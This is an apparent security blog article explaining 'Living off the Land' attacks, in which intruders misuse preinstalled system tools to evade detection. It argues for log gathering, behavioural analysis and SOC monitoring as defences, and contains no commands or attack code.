An attacker planning to infiltrate a highly-secured building wouldn’t brazenly walk through the main entrance armed with a visible weapon, only to be caught by X-ray scanners and metal detectors. Instead, they would resort to more cunning methods, perhaps using objects found inside the building—like a knife from the kitchen—to carry out their attack after bypassing initial security checks.
This scenario finds its digital counterpart in a growing cybersecurity menace known as “Living off the Land” (LoL). Once the hallmark of state-sponsored hackers targeting major organizations, LoL attacks are increasingly adopted by ransomware gangs and other cybercriminals against small and medium-sized businesses.
What is ‘Living off the Land’?
The idea behind Living of the Land is to use the tools and programs already installed in the system in order to launch an attack. This comes with many advantages for our adversaries: they don’t need to develop and maintain malware, they don’t need to host, download nor deploy it on the system they are attacking, and antivirus won’t detect it. But the real advantage of using LoL attacks is that they “blend in” and hide within the noise of legitimate work operations. This approach of hiding in plain sight as a way to evade detection does not only confuse traditional security tools, but also will not seem suspicious to an untrained eye looking at these activities.
The Challenge of Detection
Protecting against LoL attacks is challenging yet essential. The cybersecurity industry has identified over 400 legitimate and pre-sintalled tools that hackers exploit in these attacks. But many are not commonly used by system administrators nor end-users, suggesting a straightforward solution: remove or restrict access to these tools. However, this approach isn’t always practical.
In order to catch the threats that are attempting to fly under the radar, organizations should now shift their focus from traditional signature-based detection methods to more log gathering, behavioral analysis and anomaly detection. These types of approaches cannot be automated as context is very important in order to differentiate a legitimate use of a tool compared to a malicious one; and such methods require human expertise and contextual understanding. This is where a Security Operation Center (SOC) make the difference: either inhouse or outsourced, the SOC will receive alerts on suspicious behavior or execution that will have to be investigates, by knowing what are the usual threat actor tradecraft, understanding the intent of the execution and by knowing the normal behavior in an organization, the SOC analyst will be able to detect, block and prevent the malicious usage of legitimate files.
While Living of the Land attacks are not new, their increasing prevalence poses a significant threat to organizations of all sizes. Fortunately, as the threat is not new, technics for protecting our environments do already exist; they now just have to be implemented everywhere.